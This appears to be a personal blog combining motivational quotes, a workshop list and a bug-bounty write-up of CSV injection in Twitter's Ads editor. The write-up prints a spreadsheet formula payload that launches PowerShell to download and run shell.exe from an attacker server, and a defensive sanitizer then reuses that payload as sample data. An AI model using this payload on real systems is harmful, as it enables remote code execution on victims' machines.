Top 10 Quotes Which Inspire Me Everyday and Reason Why you should NeverGiveUp

In order to be successful at anything in life, you need to first believe that you deserve to be. So for that you need to love yourself.

Loving others is easy. Loving yourself is the hard part, or so we often think. Self-motivation is the ability to do what needs to be done without influence from other people or situations. People with self-motivation can find a reason and the strength to complete a task, even a challenging one, without giving up or needing someone else to encourage them.

A good way to stay continuously self-motivated is to follow something like these 5 steps, which I use myself:
1. Stay positive. See the good in the bad.
2. Know yourself. Keep notes on when your motivation sucks and when you feel like a superstar.
3. Stop overthinking. Just do.
4. Keep good company. Make more regular encounters with positive and motivated people.
5. Start simple and keep learning. Read and try to take in everything you can. The more you learn, the more confident you become.

Many of us find ourselves in motivational slumps that we have to work to get out of. Sometimes it’s like a continuous cycle where we are motivated for a period of time, fall out and then have to build things back up again.
Here are my Top 10 Quotes Which Inspire Me Everyday and Reason Why you should NeverGiveUp in your life.

1. "If you don't give up, you still have a chance"
   - Jack Ma

2. "Pay the price today so you can pay any price tomorrow."
   - Grant Cardone

3. "You have to learn the rules of the game. And then you have to play better than anyone else."
   - Albert Einstein

4. "Life is like a piano. What you get out of it depends on how you play it."
   - Tom Lehrer

5. "Love yourself first and everything else falls into line. You really have to love yourself to get anything done in this world."
   - Lucille Ball

6. "Never make someone a priority when all you are to them is an option."
   - Maya Angelou

7. "Until you value yourself, you won't value your time. Until you value your time, you will not do anything with it."
   - M. Scott Peck

8. "If someone offers you an amazing opportunity and you're not sure you can do it, say yes - then learn how to do it later."
   - Richard Branson

9. "Every next level of your life will demand a different you."
   - Leonardo DiCaprio

10. "Ups and downs in life are very important to keep us going, because a straight line even in an ECG means we are not alive"
   - Ratan Tata


Last but not least, many people ask me why I share such posts and spend time writing blogs, etc. So here is the answer:

"The world has enough critics. Be an encourager" - Anonymous



I hope this will help you guys to motivate yourselves. If it helps you in some way or other, share it with your friends and be part of the NeverGiveUp Community.

Twitter CSV Injection - Going beyond Pop-Up Calculator to Taking Meterpreter Shell

Hi folks,

After a long time, I thought of publishing one of my findings. Back in time, I targeted the `Twitter` application in the hope of getting some juicy bugs. This time I was looking for some different bugs, apart from the usual XSS, SQLi, etc.


tl;dr - this vulnerability exploits CSV injection to gain a Meterpreter session on a victim's local system.

How it started :- 

I was testing one of Twitter's features, called 'Ads editor'.
According to Twitter, with Ads editor you can leverage the power of Excel to manage your campaigns at scale. That sounds cool, as it uses a feature like 'Excel'. There is also an option under 'Edit access to account' in which the account admin can add different users and assign roles accordingly [Roles are: Account Administrator, Ad Manager and Analyst].


By this time I was pretty clear that I should check for a "CSV Injection Attack".


Proof of Concept :- 

I noticed that the `Name your audience` field was vulnerable to CSV injection that could be chained with a meterpreter payload resulting in client side remote code execution.

I sent this bug report with all the details to the Twitter security team.

And I got the reply below.




But wait



HOPES ALIVE :)

I created a video POC containing full exploitation in which I was able to get a reverse shell connection back to the attacker's machine by using the following payload:
=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0


OR
Click here for Direct Video Link

The payload above works as follows: when the CSV file is opened, PowerShell is launched in the background and attempts to fetch the PowerSploit Invoke-Shellcode payload, which then attempts a reverse shell connection back to the attacker's server.
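On the defensive side, here is an added example (my own code, not from the original post or from Twitter) of how an application that exports user-supplied text to CSV can neutralise cells that a spreadsheet would otherwise evaluate as formulas. The column names and sample rows are constructed; the payload row reuses the one quoted above.

```python
import csv
import io

# Leading characters that make Excel or LibreOffice evaluate a cell as a
# formula (the OWASP "CSV Injection" list). Tab and carriage return are
# included because Excel strips them before deciding the cell is a formula.
FORMULA_TRIGGERS = ("=", "+", "-", "@", "\t", "\r")


def is_formula_like(value):
    """True if a spreadsheet would treat the string as a formula. Useful for
    flagging or logging input such as an 'audience name' at submission time."""
    return isinstance(value, str) and value.startswith(FORMULA_TRIGGERS)


def sanitize_cell(value):
    """Neutralise one cell for CSV export: a leading formula trigger gets a
    single-quote prefix, which spreadsheets read as 'this cell is text'.
    Escaping of commas and embedded double quotes is left to csv.writer."""
    text = "" if value is None else str(value)
    return "'" + text if is_formula_like(text) else text


def export_csv(rows):
    """Serialise rows (lists of cells) as CSV text with every field quoted and
    every cell sanitised; returns the CSV document as a string."""
    buf = io.StringIO()
    writer = csv.writer(buf, quoting=csv.QUOTE_ALL, lineterminator="\n")
    for row in rows:
        writer.writerow([sanitize_cell(cell) for cell in row])
    return buf.getvalue()


# Constructed sample export: an audience list in which one name carries the
# payload quoted in the write-up, alongside other formula-shaped values.
SAMPLE_ROWS = [
    ["audience_name", "size"],
    ["Retargeting - Q3", 1200],
    ["=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0", 1],
    ["+1 campaign", 10],
    ["@mentions", 5],
    ['He said "hi"', 2],
]

if __name__ == "__main__":
    print(export_csv(SAMPLE_ROWS))
```

The single-quote prefix is visible in the formula bar but keeps the cell inert; rejecting or flagging formula-like values at input time with is_formula_like is the complementary control.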

Well, what next..



This is what the life of a bug hunter looks like.

Moral Of The Story:- 
I had never tried going beyond the pop-up calculator whenever I submitted bugs related to CSV injection, but this gave me an opportunity to exploit it fully. So on a positive note, accept things and then move on. And most importantly, if you fail? Well, try harder!

Vulnerability timeline:

Aug 14, 2016  : Reported to Twitter Security Team via the HackerOne platform.
Aug 17, 2016  : Report marked as "Duplicate".
Aug 17, 2016  : Report reopened and status changed to "Need More Info".
Aug 17, 2016  : Shared the video POC exploit.
Aug 23, 2016  : Report again marked as "Duplicate".
June 23, 2017 : Responsible disclosure, as per HackerOne policy.

Hall Of Fame



I have been helping companies improve their security by finding vulnerabilities in their software and helping them patch it, and they have included me in their security acknowledgements pages for reporting valid security issues:

Google
Microsoft
Yahoo
Adobe
Red Hat
AT&T
BlackBerry
Sony
General Motors
OWASP
Cobalt
Blockchain
OLX
Imgur


And many more...
 







Conference Talks

The Journey :- 

Back in time, when I was a newbie in the infosec domain, I was trying my hand at learning the basics of infosec; this included workshops and blogs. The most important question running in my mind was where to start, so that I could take the first step up the ladder of this journey to become an Ethical Hacker.

Thankfully, by the grace of God, all my hard work paid off. [Big story]

My first talk was at the null Mumbai chapter. After that I started getting many invites from different colleges to conduct workshops on Ethical Hacking, and then the journey of delivering talks began. Now there is no looking back: I help all the beginners and support all the people who are hunting for the way to become a hacker or infosec geek. So, to make sure that newbies avoid the struggle I faced during my beginning, I started helping and supporting via this medium.

In this journey many people asked, "You started taking seminars or conferences, so is it for the money, fame, a publicity stunt, or bla bla?" So here is the answer to all those people.


Let's come back to the current state and see what this blog section is about.

I have conducted many Security Talks at different colleges and events which I will be listing in this section.

So if you want me to conduct Security Talks at your college, then drop me an email.
I would love to share the knowledge.


Year 2018

1] Got invited to conduct a workshop on "Ethical Hacking" at Sardar Patel Institute Of Technology

Venue details:- 
SPIT College - 14th Aug 2018

Audience :- 
MCA Department


Year 2017

1] Got invited to conduct a workshop on "Ethical Hacking - Security Attacks/Tools/Mitigation Techniques" at Shri Bhagubhai Mafatlal Polytechnic - SVKM

Venue details:- 
Shri Bhagubhai Mafatlal Polytechnic - 15th March 2017

Audience :- 
Department of Information Technology - Shri Bhagubhai Mafatlal Polytechnic







2] Got invited to conduct the "AICTE-ISTE approved Ethical Hacking workshop" at SIES Graduate School of Technology

Venue details:- 
SIES Graduate School of Technology, Vidyapuram, Sector 5, Nerul, Navi Mumbai - 2nd July 2017

Audience :- 
The Computer Engineering department of SIES Graduate School of Technology
AICTE-ISTE approved Ethical Hacking workshop
AICTE :- All India Council for Technical Education (AICTE)
ISTE  :- Indian Society for Technical Education (ISTE)







3] Got invited to conduct a workshop on "Ethical Hacking" at SNDT College - Shri M.D. Shah Mahila College of Arts and Commerce.

Venue details:- 
BJ Patel Rd, Near Liberty Garden, Malad West, Mumbai, Maharashtra 400064 - 9th September 2017

Audience :- 
BCA Students


Year 2016

1] Got invited to conduct a workshop on "Cyber Security - Hands-On Workshops" at Sardar Patel Institute of Technology (SPIT)

Venue details:- 
Sardar Patel Institute of Technology - 8th Oct 2015

Audience :- 
Department of Information Technology and Masters of computer application







Year 2015

1] Got invited to conduct a workshop on "Cyber Security" at Sardar Patel Institute of Technology (SPIT)

Venue details:- 
Sardar Patel Institute of Technology - 3rd Oct 2015

Audience :- 
MCA Department


2] Conducted a workshop on "It's all about CSRF" at the null Mumbai Meet

Venue details :-
null Mumbai Meet 10 January 2015 Null/OWASP Mumbai Chapter Monthly Meet

Slides :-
It's all about CSRF


Year 2014

1] Conducted a workshop on "Wireless Security"

Venue details :-
null Mumbai Meet 13 September 2014 Null/OWASP Mumbai Chapter Monthly Meet

Slides :-
Wireless Security